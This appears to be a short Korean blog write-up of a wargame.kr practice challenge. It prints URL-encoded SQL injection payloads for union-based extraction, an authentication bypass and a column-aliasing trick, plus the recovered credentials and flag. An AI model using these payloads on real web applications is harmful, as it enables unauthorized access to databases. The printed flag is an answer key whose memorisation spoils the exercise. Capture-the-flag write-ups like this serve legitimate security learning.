다행히 '를 막아놓지 않았음 이를 이용해서 id와 password는 쉽게 알수 있는데


<password>

id=%27%20union%20select%201%2c&pw=%2c3%2c4%2c5%2

xPw4coaa1sslfe

!@SA#$!


<id>

adm1ngnngn

id=%27||1%23



문제는 flag.. as(alias)를 이용한다

select 1,t,3,4 from (select 1,2,3,4 as t union select * from web) as tt;

이런식의 쿼리를 쓰면 칼럼의 위치만 알아도 원하는 칼럼을 출력할 수 있다.

as를 잘 이해하면 저 쿼리를 이해할 수 있다.


<flag>

buhyH3XvBVPJKmnx9F8sLzRp2USTCcOotZ67IgQND5WYdi40alwrkqAEfGMe1j

id=%27%20union%20select%201%2cq%2c3%2c4%2c5%20from%20(select%201%2c2%2c3%2c4%20as%20q%20%2c5%20union%20select%20*%20from%20findflag%5f2)%20as%20t%20limit%201%2c1%23


'war game > wargame.kr' 카테고리의 다른 글

[wargame.kr]Crypto Crackme Basic  (0) 2017.03.08
[wargame.kr]Qna  (1) 2017.03.03
[wargame.kr]ip_log_table  (0) 2017.03.02
[wargame.kr]lonely_guys  (0) 2017.03.02
[wargame.kr]dmbs335  (0) 2017.02.25

+ Recent posts

티스토리툴바